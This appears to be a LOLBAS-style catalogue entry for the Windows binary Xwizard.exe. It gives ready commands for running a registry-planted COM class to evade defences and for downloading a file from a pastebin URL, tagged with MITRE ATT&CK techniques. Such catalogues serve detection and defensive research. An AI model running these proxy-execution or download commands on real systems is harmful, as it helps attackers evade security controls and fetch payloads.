.. /Xwizard.exe
Star

Execute custom class that has been added to the registry or download a file with Xwizard.exe


Paths:

Resources:
Acknowledgements:

Detection:

Execute

Xwizard.exe running a custom class that has been added to the registry.
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
Usecase: Run a com object created in registry to evade defensive counter measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1218



Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Usecase: Run a com object created in registry to evade defensive counter measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1218



Download

Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Usecase: Download file from Internet
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105